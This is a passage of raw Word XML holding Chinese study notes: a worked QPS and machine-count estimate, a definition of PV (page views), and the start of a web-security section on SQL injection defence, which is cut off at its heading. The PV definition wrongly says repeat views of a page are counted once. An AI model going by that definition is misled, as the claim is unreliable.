          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的在单台机器上，这台机器需要多少</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>QPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">( 3000000 * 0.8 ) / (86400 * 0.2 ) = 139 (QPS) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B3E" w:rsidRDefault="008327C2" w:rsidP="00CE213D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:left="585"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>１００×０</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>８</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)/86400</w:t>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>问：如果一台机器的</w:t>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>QPS</w:t>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，需要几台机器来支持？</w:t>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r w:rsidR="00F23B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">139 / 58 = 3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005240A8" w:rsidRPr="005240A8" w:rsidRDefault="004312E1" w:rsidP="00022A5D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>什么是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PV(page view)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，即页面浏览量，或点击量；通常是衡量一个网络新闻频道或网站甚至一条网络新闻的主要指标。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　高手对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的解释是，一个访问者在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>点到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内到底看了你网站几个页面。这里需要强调：同一个人浏览你网站同一个页面，不重复计算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>量，点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>次也算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>次。说白了，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就是一个访问者打开了你的几个页面。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之于网站，就像收视率之于电视，从某种程度上已成为投资者衡量商业网站表现的最重要尺度。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的计算：当一个访问着访问的时候，记录他所访问的页面和对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，然后确定这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>今天访问了这个页面没有。如果你的网站到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>点，单纯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>万条的话，每个访问者平均访问了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个页面，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表的记录就要有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>万条。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有一个可以随时查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>流量以及你的网站世界排名的工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>alexa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>工具条，安装吧！网编们一定要安装这个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006446CD" w:rsidRPr="00F41A4C" w:rsidRDefault="006446CD" w:rsidP="006446CD">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>7 Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E58FD" w:rsidRPr="00F41A4C" w:rsidRDefault="005E58FD" w:rsidP="005E58FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 </w:t>
      </w:r>
      <w:r w:rsidR="008140D4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="008140D4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注入如何防御</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008140D4" w:rsidRPr="00F41A4C" w:rsidRDefault="008140D4" w:rsidP="008140D4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>发生</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
